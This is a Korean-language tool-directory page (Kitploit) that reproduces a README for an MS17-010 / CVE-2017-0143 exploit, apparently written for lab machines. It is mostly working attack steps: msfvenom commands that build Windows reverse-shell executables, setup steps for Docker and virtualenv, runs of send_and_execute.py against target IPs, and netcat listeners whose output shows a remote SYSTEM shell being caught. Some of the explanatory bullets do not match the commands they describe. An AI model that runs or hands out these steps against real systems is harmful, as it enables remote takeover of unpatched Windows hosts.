Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
MS17-010_CVE-2017-0143 — MS17-010_CVE-2017-0143 | Kitploit
도구/GitHubGitHub/h3x0v3rl0rd/ms17-010_cve-2017-0143
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingRemote Access Tool
GitHubh3x0v3rl0rd/ms17-010_cve-2017-0143

MS17-010_CVE-2017-0143

MS17-010_CVE-2017-0143

저장소 보기
40141년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

MS17-010

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2017-0143

Docker

msfvenom을 사용하여 페이로드 생성:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe
  • -p windows/shell_reverse_tcp: 페이로드(Windows용 역방향 TCP 셸)를 지정합니다.
  • LHOST=10.10.14.4: 공격자의 IP 주소(대상이 연결할 주소)입니다.
  • LPORT=443: 공격자 시스템에서 연결을 수신할 포트입니다.
  • -f exe: 페이로드를 실행 파일로 출력합니다.
  • -a x86: 아키텍처(32비트)를 지정합니다.
  • -o rev.exe: 페이로드를 rev.exe로 저장합니다.

Docker 컨테이너 설정:

  • Docker를 사용하는 이유?
    • Docker는 익스플로잇 실행을 위한 일관되고 격리된 환경을 제공합니다.
    • 의존성 문제(예: Python 버전 충돌, 누락된 라이브러리)를 방지합니다.

Docker 설정 단계:

root@kitploit:~
sudo apt-get install docker.io

폴더 구조 생성:

root@kitploit:~
mkdir exploit
cd exploit
touch Dockerfile
echo "impacket==0.9.23" > requirements.txt
  • Dockerfile: Docker 컨테이너를 빌드하기 위한 지침이 포함되어 있습니다.
  • requirements.txt: Python 의존성 목록(예: impacket)입니다.

Dockerfile 작성:

root@kitploit:~
FROM python:2.7-alpine
RUN apk --update --no-cache add \
    git \
    zlib-dev \
    musl-dev \
    libc-dev \
    gcc \
    libffi-dev \
    openssl-dev && \
    rm -rf /var/cache/apk/*

RUN mkdir -p /opt/exploit
COPY requirements.txt /opt/exploit
COPY ms17-010.exe /opt/exploit
WORKDIR /opt/exploit
RUN pip install -r requirements.txt
  • FROM python:2.7-alpine: Python 2.7이 포함된 경량 Alpine Linux 이미지를 사용합니다.
  • RUN apk --update --no-cache add: 필요한 의존성(예: git, gcc)을 설치합니다.
  • COPY rev.exe /opt/cattime: 역방향 셸 실행 파일(rev.exe)을 컨테이너 안으로 복사합니다.
  • RUN pip install -r requirements.txt: Python 의존성(예: impacket)을 설치합니다.

Docker 컨테이너 빌드:

root@kitploit:~
sudo docker build -t exploit .

컨테이너 실행:

root@kitploit:~
sudo docker run -it exploit /bin/sh

익스플로잇 다운로드 및 실행:

root@kitploit:~
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
root@kitploit:~
cd MS17-010_CVE-2017-0143
root@kitploit:~
python send_and_execute.py 10.10.10.4 ../ms17-010.exe

역방향 셸:

root@kitploit:~
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1035
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

이전 방법들

방법 1

root@kitploit:~
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143/
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o ms17-010.exe

nc 리스너 생성

root@kitploit:~
nc -nlvp 1337

익스플로잇

root@kitploit:~
python2.7 send_and_execute.py 10.129.163.162 ms17-010.exe

image

이와 같은 오류가 발생하면 다음 단계를 따르세요:

root@kitploit:~
cd MS17-010_CVE-2017-0143/
sudo python2.7 get-pip.py
pip2.7 install --upgrade setuptools
python2.7 -m pip install impacket

이제 익스플로잇을 실행할 수 있습니다: image

image

방법 2

이 익스플로잇은 python2로 작성되었으며 impacket, pycrypto와 같은 라이브러리가 필요합니다. 이를 위해 가상 환경을 설정해야 하며, 여기서 virtualenv 프로그램이 도움을 줍니다. 환경을 생성한 후 source 유틸리티 프로그램을 사용하여 해당 환경을 활성화할 수 있습니다. 최신 Kali에서는 python3가 전역 인터프리터로 설정되어 있고 익스플로잇은 python2로 작성되었기 때문에 python2를 인터프리터로 사용합니다.

가상 환경을 사용하는 이유는 무엇인가요? 자세한 내용은 이 링크를 확인하세요. https://www.dabapps.com/blog/introduction-to-pip-and-virtualenv-python/

root@kitploit:~
virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto

image

image

root@kitploit:~
python checker.py 10.10.10.4

image

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4445 -f exe > shell.exe

image

root@kitploit:~
python send_and_execute.py 10.10.10.4 shell.exe 445 browser

image

root@kitploit:~
nc -nlvp 4445

image

도구 다운로드